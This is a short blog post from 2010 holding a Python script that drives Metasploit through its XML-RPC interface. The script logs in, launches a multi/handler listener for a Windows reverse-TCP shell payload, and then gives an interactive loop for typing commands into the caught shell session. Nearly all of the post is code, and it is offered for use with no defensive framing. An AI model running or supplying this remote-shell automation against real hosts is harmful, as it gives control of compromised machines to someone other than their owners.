Wednesday, June 16, 2010

python metasploit xmlrpc interface 1.0


#!/usr/bin/python

import xmlrpclib
class MSFTransport(xmlrpclib.Transport):
"""Handles an transaction to the MetasploitXML-RPC server."""

# client identifier (may be overridden)
def __init__(self, use_datetime=0):
self._use_datetime = use_datetime
def request(self, host, handler, request_body, verbose=0):
# issue XML-RPC request
c = self.make_connection(host)
if verbose:
h.set_debuglevel(1)
self.send_content(c, request_body)
self.verbose = verbose
return self._parse_response(None, c)

def make_connection(self, host):
import socket
addr = host.split(":")
inetaddr = (addr[0],int(addr[1]))
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(inetaddr)
return c
def send_content(self, connection, request_body):
if request_body:
connection.send(request_body + "\0")
def _parse_response(self, file, sock):
# read response from input file/socket, and parse it
p, u = self.getparser()
while 1:
if sock:
response = sock.recv(1024)
else:
response = file.read(1024)
if not response:
break
if response.endswith("\0") :
response = response.rstrip("\0\n")
p.feed(response.encode("utf-8"))
break;
else:
p.feed(response.encode("utf-8"))

if file:
file.close()
p.close()

return u.close()
################################
from time import sleep
import base64
import xmlrpclib
#import MSFTransport
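msftransport = MSFTransport()
# Only the host:port part of this URL is used (see MSFTransport.make_connection);
# the "http" scheme is not spoken on the wire.
proxy = xmlrpclib.ServerProxy("http://127.0.0.1:55553", transport=msftransport)

ret = proxy.auth.login("msf", "test")
if ret['result'] == 'success':
    token = ret['token']
else:
    # Every later call needs the token, so stop here instead of failing
    # with a NameError further down.
    print "Could not login\n"
    raise SystemExit(1)

opts = {
    "RHOST": "192.168.1.1",
    "LHOST": "127.0.0.1",
    "LPORT": 4444,
    "PAYLOAD": "windows/shell_reverse_tcp"}
print "Running exploit now"
ret = proxy.module.execute(token, "exploit", "multi/handler", opts)
if ret['result'] == 'success':
    print "Exploit sucessful...waiting on session"
    # fixed grace period before the session list is queried
    sleep(25)
# queried unconditionally: the check further down reads session_list either way
session_list = proxy.session.list(token)
x = session_list.keys()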

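def s_io(s):
    """Interactive loop: forward each typed line to shell session ``s``.

    Reads a command from stdin, sends it base64-encoded through
    ``session.shell_write`` and prints the base64-decoded ``data`` field
    of the following ``session.shell_read``.  Typing ``exit`` or closing
    stdin (EOF) ends the loop.  Uses the module-level ``proxy`` and
    ``token``.
    """
    while 1:
        try:
            w = raw_input("shell> ")
        except EOFError:
            # Ctrl-D: leave cleanly instead of dying with a traceback
            break
        if w == "exit":
            break
        # shell_write's return value is not needed; the reply is fetched
        # with the read call that follows
        proxy.session.shell_write(token, s, base64.b64encode(w + "\n"))
        read = proxy.session.shell_read(token, s)
        print base64.b64decode(read['data'])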

# Attach to the first listed session, but only when it is a plain shell.
if session_list:
    first_id = x[0]
    if session_list[first_id]['type'] == 'shell':
        s = int(first_id)
        s_io(s)
